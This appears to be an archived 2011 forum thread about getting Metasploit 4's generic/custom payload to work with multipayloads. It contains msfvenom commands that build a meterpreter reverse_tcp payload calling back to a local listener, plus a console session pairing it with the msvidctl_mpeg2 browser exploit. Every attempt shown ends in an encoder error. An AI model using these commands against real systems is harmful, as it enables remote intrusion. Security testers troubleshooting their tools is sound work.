8 Replies Latest reply on Oct 28, 2011 8:57 PM by dig2play

    MSF4 custom/generic with multipayloads

      Hi everyone.

       

      I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console  : 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a derth of informoration on what the payload supports in terms of encodings and compatibility.

       

      Basically I'm looking at how a server side service can be shutdown, then have the meterpreter listen on it's no longer bound port. (the exploit would come in on another port)

       

      Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (note that the custom/generic payload .rb source say something about only allowing None encoding)

       

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

       

      I also tried it with EXITFUNC set to "none":

       

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

       

      Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, .rb formats)

       

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

       

      Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)

       

      msf > use exploit/windows/browser/msvidctl_mpeg2

      msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom

      PAYLOAD => generic/custom

       

      msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw

      PAYLOADSTR => c:\metasploit\test\msf.raw

      msf  exploit(msvidctl_mpeg2) > exploit

       

      [-] Exploit failed: No encoders encoded the buffer successfully.

       

      msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe

      PAYLOADSTR => c:\metasploit\test\msf.exe

      msf  exploit(msvidctl_mpeg2) > exploit

       

      [-] Exploit failed: No encoders encoded the buffer successfully.


      msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw

      PAYLOADFILE => c:\metasploit\test\msf.raw

      msf  exploit(msvidctl_mpeg2) > exploit

       

      [-] Exploit failed: No encoders encoded the buffer successfully.

       

      msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe

      PAYLOADFILE => c:\metasploit\test\msf.exe

      msf  exploit(msvidctl_mpeg2) > exploit

       

      [-] Exploit failed: No encoders encoded the buffer successfully.

       

       

      So I found an explanation on what the "No encoders encoded..." error is supposed to mean. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) This is where stager payloads come in I suppose.

       

      Is the cause of the error the windows/msgbox payload because its not staged? Or is it that multipayloads aren't staged? If it's the later, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

       

      Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.

       

      Thanks in advance! I promise to reply with how I got this working once I do.

        • Re: MSF4 custom/generic with multipayloads

          Just a quick update. I tried a simple, single custom payload from meterpreter and messagebox. Both are larger than 200 bytes. Meaning they would have to be staged. (even the messagebox?) I still get the "No encoders encoded" error with either.

           

          c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f rb -e generic/none LHOST=192.168.1.100 EXITFUNC=thread > test\msgbox.rb

          [*] generic/none succeeded with size 270 (iteration=1)

           

          c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none LHOST=192.168.1.100 EXITFUNC=thread > GENESIS\msgbox.raw

          [*] generic/none succeeded with size 270 (iteration=1)

           

          Is multipayload support staging compatible? Is it only expected to be used in a payload file drop? How does multipayload work with staging? Here's the few useful tidbits I've found on the topic:

           

          http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

          http://dev.metasploit.com/redmine/issues/4714 # Note that bug #4714 is a msfvenom enhancement, and the multipayload shown is msgbox/meterpreter as I am also trying. However it doesn't go beyond creating the .exe.

           

          Knowing if a custom multipayload is possible with the MSF console would save a lot of time.

           

          Thanks!

            • Re: MSF4 custom/generic with multipayloads
              hdmoore

              Exploit modules do not use external files to specify payloads; they generate them on the fly based on the PAYLOAD module setting and the datastore options.

                • Re: MSF4 custom/generic with multipayloads

                  Thanks for the quick reply.

                   

                  My confusion is that the generic/custom payload module, which I assume to be compatible with exploit modules, seems to be available for the sole purpose of specifying an external payload file. It's info describes it as being able to "Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.", where "PAYLOADFILE, The file to read the payload from".

                   

                  http://www.metasploit.com/modules/payload/generic/custom

                   

                  I know this blog post on MFS4.01 isn't from the Rapid7 site itself, but it seems pretty knowledable on the newer multipayload and generic/custom support in 4.01.

                   

                  http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

                   

                  "Generic/custom

                  The first change was an addition of a single custom payload. Prior to this, a custom payload existed for command execution exploits for UNIX (payload/cmd/unix/generic) but there was no analogous payload for command execution exploits for Windows, or for that matter any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is preferable. But in some cases, such as generating multiple payloads, Metasploit might not currently support the UI or backend to generate the payload in a conventional way, and you may want to import the payload from a file or option. Or while writing a payload, it can be easier to import a payload into the framework than change a module."

                   

                  Maybe I misinterpreted your reply and I should understand it as, "The external payload files generated by msfvenom are in no way compatible with msf as an exploit payload". And that the generic/custom module is for 100% intact payload .rb source? (I'm still confused as to whether multipayloads are possible)

                   

                  Sorry for all the questions. Your reply was my understanding before I started trying to figure out if multiple or chain payloads were possible without having to write a custom payload with everything thrown in at once.

                   

                  Thank you.

                    • Re: MSF4 custom/generic with multipayloads
                      hdmoore

                      Ah - I missed that setting in your previous log - that should work, but it may be a buggy, its not a use case we test often (or one I have ever tried). The issue may be that the selected payload is too big for the exploit; make sure it is less than the Payload Size field in the "info" output and leave some room for the overhead of a decoder (30-40 bytes).

                        • Re: MSF4 custom/generic with multipayloads

                          Thanks! That helps!

                           

                          Yes, from the "[-] Exploit failed: No encoders encoded the buffer successfully" I understood that the single payload size limit was greater than the exploit would allow, but the sizes msfvenom is producing are under this.

                           

                          > use msvidctl_mpeg2

                          > info

                           

                          ...

                          Payload information:

                            Space: 1024

                            Avoid: 6 characters

                           

                          I tried a windows/exec payload and the CMD="msg %username% 'test'" the resulting size is 208 with no encoding. It failed to exploit with "No encoders encoded the buffer successfully".

                           

                          I also tried, for fun, to encode the payload with the x86/shikata_ga_nai encoder, but it kind of bumped the size up to 235 with no success.

                           

                          Maybe I'm using the generic/custom payload module incorrectly. Or do you think I should try to switch back to msfpayload/msfencode? I could try a million premutations and not know which one was the closest, unless it worked.

                           

                          Thanks again.